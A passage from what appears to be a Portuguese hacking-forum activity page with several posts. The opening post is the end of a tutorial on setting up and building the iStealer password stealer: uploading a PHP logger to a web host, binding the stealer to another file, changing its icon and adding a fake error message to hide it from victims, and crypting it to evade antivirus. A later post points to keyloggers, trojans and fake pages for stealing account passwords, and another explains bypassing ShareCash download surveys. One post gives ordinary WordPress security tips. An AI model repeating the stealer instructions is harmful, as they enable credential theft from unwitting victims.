    Agora vá para o diretório que você acabou de criar e criar mais 2 sub-diretórios dentro dele como fez na etapa anterior.
    Por isso vai ser algo como isto public_html passatempo>> teste e trabalho
    Agora vá para qualquer um dos últimos dois diretórios que você acabou de criar e clique no "Upload" index.php selecionar e style.css e depois clique no botão Tick para upload.
    Volte para a pasta raiz e marque a caixa ao lado public_html e depois clique em "Chmod" e siga essa imagem:

    PASSO 6: Building sua iStealer
    Execute o arquivo Legends.exe iStealer_6.3 presentes na pasta iStealer 6,3 para obter algo como:

    Agora, basta preencher o seguinte em Istealer: Url: yourdomainname.com / index.php
    Você pode vincular Istealer para qualquer outro arquivo, fazendo "Bind com outro arquivo" e dando caminho do arquivo para vincular. Além disso, você podeAlterar ícone para alterar o ícone de arquivo Istealer. Este passo é opcional, mas necessário, para esconder o istealer dos olhos da vítima. Você pode vincular arquivo de senhas stealer com falsa mensagem de erro para torná-la mais real.
    Para verificar se você digitou as informações do servidor ftp direito, clique em "test Url " e se você tiver feito tudo certo, você receberá uma mensagem "Works perfect!". Se ele diz "Logger not found, check the Url", que introduziu algo de errado ... basta verific ar novamente.
    Quando você tiver feito todos os passos acima, basta clicar em "Build" e salve o arquivo hack.
    Você também pode usar Crypter para evitar a detecção antivírus.
    LEMBRANDO : Este tutorial e so para fins educacionais http://cyber-gamers.org/public/style_emoticons/default/blink.png .Qualquer que você fizer to nen ai nen ti conheço http://cyber-gamers.org/public/style_emoticons/default/ph34r.png
  23. Upvote
    V¡®u§ got a reaction from p0w3r0ff in Como proteger site WordPress De Hackers   
    Depois de um topico que fis de hack de WebSite,decidi fazer mais um topico nesta categoria que se baseia WordPress segurança do website. Hoje em dia WordPress é uma das plataformas mais populares para muitos blogueiros e todos os dias, milhares de novas pessoas estão usando WordPress. WordPress também oferece Sistemas de Gerenciamento de Conteúdo poderosa (CMS). Devido a essa popularidade.

    Neste topico eu estou indo para compartilhar algumas dicas importantes para garantir site WordPress seguro contra hackers, assim você pode manter seu foco em blogs, em vez de segurança do website hackeado.

    Como não há tal software, como um anti-vírus, disponíveis para proteger o seu website. A maioria das pessoas considera apenas o trabalho é feito, uma vez que a configuração do site. Ele definitivamente não é. Você pode proteger um site ou servidor web com apenas alguns esforços continuado.
    Siga os seguintes passos a fim de proteger WordPress Website / Blog.
    1) Use Scripts Open Source:

    Se você não sabe o que está fazendo ou ter uma equipe de desenvolvimento bem paga em sua folha de pagamento, é uma ótima idéia para usar scripts de código aberto. Scripts de código aberto como o WordPress, Drupal, Joomla, Magento etc são característica ricos, poderosos e são apoiados por milhares de programadores para atualização e suporte.

    Isso evita cair na armadilha de sites hackers e spammers devido ao código mal escrito. Em vez de construir do zero, você pode usar os scripts existentes e modificá-los ao seu gosto. Scripts comerciais de empresas de renome também pode ser implantado se as atualizações que emitem e patches regularmente.

    2) Use senhas de alta segurança:

    Senhas como "cyberlove0123", "uncyberlover" definitivamente não são bons. Sua senha não tem que refletir a sua "persona interior", como eles devem manter as coisas seguras.

    Use uma combinação de números, caracteres especiais e alfabetos e certifique-se que são pelo menos 10 caracteres. Aplicativos como o KeePass, LastPass etc, podem ajudar a gerar senhas fortes e para armazená-los também.

    3) Atualize constantemente:

    Atualizar para versões mais recentes de scripts ou adicionar novas funcionalidades assim que eles forem lançados. Intenção principal de Upgradation é para corrigir bugs no script e são tão importantes quanto um upgrade de versão completa.

    5) Seguro Endereço Admin Email:

    Manter o endereço de email de administração usado para efetuar login no seu servidor web, CMS, etc banco de dados de distância dos olhos do público, não compartilhar o endereço de e-mail como no site ou no forum / site de rede social. Use um endereço totalmente diferente em sua página de contato. Isso ajudará a de não ser enganado por um e-mail phising disfarçado de ter sido enviado por sua empresa de hospedagem ou registro de domínio.

    6) Adicionar um prefixo de tabela de banco de dados:

    Se você estiver usando um script CMS, blog ou fórum, alterar o padrão prefixo da tabela do banco de dados. Por exemplo, no caso do WordPress, o padrão prefixo da tabela do banco de dados é "wp". Portanto, se um hacker brilhante encontra uma maneira de extrair dados de um banco de dados, prefixos de tabela padrão vai axar você um alvo fácil.

    7) A senha protege o banco de dados:

    Não é um requisito obrigatório em um monte de scripts para inserir uma senha de banco de dados e deixá-los vazios ainda vai ter o script instalado. Uma senha vazia é um desperdício criminoso de uma camada adicional de segurança. Senha do banco não abrandar o site ao consultar o banco de dados, então não há absolutamente nenhuma razão para não ter um.

    8) Excluir a pasta de instalação:

    Quando a instalação é feita não há nenhum uso para a pasta de instalação em operações do dia a dia de um website. é muito possível para um hacker para executar o instalador, mais uma vez, esvaziar o banco de dados e tomar o controle do website e seu conteúdo. O ideal é fortemente aconselhado a excluir a pasta uma vez que a instalação está completa, mas se você sabe o caminho de volta ao servidor web, você também pode optar por mudar o nome da pasta.

    9) Alterar arquivo e permissões de pasta:

    Alguns scripts exigem completo de leitura e acesso de gravação ao mesmo tempo de instalação. Isto pode ser conseguido usando o código 777 nas pastas vitais, como configuração, administração etc Reverter as permissões do arquivo de volta ao seu código original, digamos 755 ou 644. Um arquivo ou pasta com o código completo de leitura escrever dá acesso fácil para injetar códigos maliciosos em seu site.

    10) Use Secured acesso FTP:

    Se o seu servidor ou ISP apoiar o acesso SFTP, aproveitar a oportunidade e fazer upload de arquivos para o servidor em criptografado. Ninguém pode saber o que você está upload ou download de e para o servidor web.

    11) Restringir o acesso Root:

    Seja podem FTP ou banco de dados, nunca dar acesso root para todos quer queira quer não. Restringir o acesso a determinadas pastas do sistema não no caso de uploads FTP por outras pessoas que o administrador do sistema.

    12) Garantir a presença de htaccess.:

    . Htaccess são muitas vezes utilizados para especificar as restrições de segurança para o diretório particular, e certifique-se que você não tenha apagado por acidente ou se ele está lá, em primeiro lugar.

    13) Adicionar arquivo robots.txt:

    robots.txt dá instruções especiais para os robôs dos buscadores como para as pastas que devem ser indexados e quais não são. Pastas com documentos, imagens etc podem ser mantidos sob sigilo que estão sendo indexados e exibido em pesquisas na web públicos.

    14) Use plugins de segurança:

    Plataformas maduras sempre tem plugins para estender a funcionalidade do núcleo do script. Procure plugins que adicionam uma camada extra de segurança e instalá-los. Por exemplo, WP Plugin Security Scan verifica se a maioria dos passos que eu mencionei acima foram implementados corretamente em uma instalação do WordPress.

    15) Leia principais blogs de tecnologia:

    Mantenha-se atualizado sobre as últimas vulnerabilidades, bugs e ataques na Internet. Haverá um período de tempo antes de as correções estejam disponíveis e essa informação vai ajudar a proteger seu site ou para fazer exame temporariamente off-line se houver uma ameaça muito séria. Wired Threat Level e Krebs sobre Segurança são bons lugares para começar.

    16) Fique longe de Scripts Nulled & Temas:

    Pirataria de scripts comerciais e temas paga é o mais fácil entre todas as outras formas de pirataria. Tamanhos de arquivo menores, a ausência da versão keygen específico, Daemons complicado, patches DLL e cracked torná-lo um andar de cake para piratear um script em vez de um jogo ou software PC.

    No entanto, ao contrário do software de desktop piratas onde um malware oculto é removido pelo software Anti-Virus, não há nenhuma maneira você pode escapar do backdoor adicionados à base de código. Mesmo para um programador experiente, é impossível passar por milhares de linhas de código para verificar se o script é livre de backboors.
    Ahh Chega to de ferias http://cyber-gamers.org/public/style_emoticons/default/cool.png
    Byee....
  24. Upvote
    V¡®u§ reacted to p0w3r0ff in [AJUDA] HACK MSN!   
    Bem Existe milhares ferramentas de hacking que podem ser usadas para descobrir senhas de Msn , Facebook , etc etc etc..
    Voçe tem começar estudar mais sobre hacking e principalmente sobre Engenharia Social...
    Tem muitos modos e muitos programa ( Keylogger Trojan Scam Pagina Fake) mas nada vai funcionar se nada sabes sobre Engenharia Social
    Com uma boa Engenharia Social o programa que vai utilizar e facultativo.
    Cumprimentos
  25. Upvote
    V¡®u§ got a reaction from p0w3r0ff in ShareCash Downloader 2012: Bypass Todos ShareCash facilmente   
    Olá acho que todos jah caimos nessa pagina de ShareCash maior coisa chata http://cyber-gamers.org/public/style_emoticons/default/dry.png, vou encinar um truque para fazer download pelo ShareCash acho que é o unico metodo que está funcionando pois maioria dos truques anteriores o ShareCash bloquiou!

    Como funciona: Nós estaremos usando Hotspot Shield, uma VPN livre se você estiver fora de os EUA como eu estou para começar uma pesquisa off $harecash onde você simplesmente pode baixar arquivos. Nós também estamos usando Sandboxie download direto do site official para evitar qualquer vírus ou algo malicioso em seu computador.(Para não me perguntarem se eu coloquei algum server de Rat , Kelogger no arquivo http://cyber-gamers.org/public/style_emoticons/default/angry.png ) Depois de baixar o programa, Extrair o programa.

    Siga os passos abaixo e você será capaz de completar e burla o ShareCash facilmente.

    Passo 1: Nós estaremos usando Sandboxie neste método, um programa que basicamente protege seu computador de coisas mal-intencionado ou potencialmente perigosos quando você executa programas através dele.

    Para fazer o download Sandboxie Download
    Passo 2: Desde $harecash dá pesquisas que exigem a verificação de um telefone se você não é dos EUA. Vamos precisar de uma VPN para mudar nosso IP para obter um ip dos EUA. Nós estaremos usando uma VPN gratuito chamado Hotspot Shield.

    Nota: Se você é de os EUA, pule esta etapa.
    Se não é se fudeu vai ter que ler até o final!. http://cyber-gamers.org/public/style_emoticons/default/laugh.png

    Para fazer o download Hotspot Shield Download
    IMPORTANTE: Ao instalar não se esqueça de clicar na caixa que diz "Fix Page Not Found Errors", como esse erro pode aparecer muito.

    Após a instalação, execute o Hotspot Shield e um ícone deve aparecer na sua bandeja. Clique direito no ícone em seguida, clique "CONNECT"

    Clique em Connect e esperar que ele diga "State: Connected". Depois de ter sido ligado, vá a qualquer site e este deve aparecer.

    Clique em "START"

    Passo 3: Procure o programa ou arquivo chamado "Browser Web Run Sandboxed". Se você não consegue encontrá-lo, basta pesquisar por "Sandbox" e uma das aparências deve ser isso.

    Uma vez que seu browser tenha aberto vá para seu link $harecash. Deve haver uma borda amarela ao redor do seu navegador quando você colocar o cursor lá, como este.

    Fora da sua download, você deve escolher uma que implica que você vai precisar baixar alguma coisa. Por exemplo, aqui estão as minhas pesquisas.

    Eu estarei escolhendo o "Ligar diretamente para as gravadoras...." uma vez que implica devo baixar alguma coisa.

    Baixar qualquer arquivo ou barra de ferramentas que você escolheu. Uma janela como esta deverá aparecer a partir de Sandbox.

    Simplesmente clique em CLOSE quando você vê esta janela. Agora, execute o programa você acabou de baixar, mas executá-lo através de seu navegador web, por exemplo, no Firefox executar o programa através de sua lista de download. Desta forma, o programa fica em modo seguro enquanto você executá-lo. Se você fez isso direito, você verá uma borda na instalação como tal.

    install seu programa ou barra de ferramentas. Quando o programa ou barra de ferramentas está terminado e ele solicita que você reinicie o navegador, que lhes permita fazer isso. Logo essa mensagem deve aparecer.

    Baixar o arquivo e, novamente, esta mensagem deve aparecer novamente.

    Clique em Recover. Feche o Firefox e qualquer programa que a pesquisa perguntou-lhe instalar e você está livre desses programas imediatamente! Vá para o diretório onde você salvou o arquivo e está feito.

    Bom é isso....
    So posso dizer uma coisa de tudo isso
    PowerOff é Travesti http://cyber-gamers.org/public/style_emoticons/default/laugh.png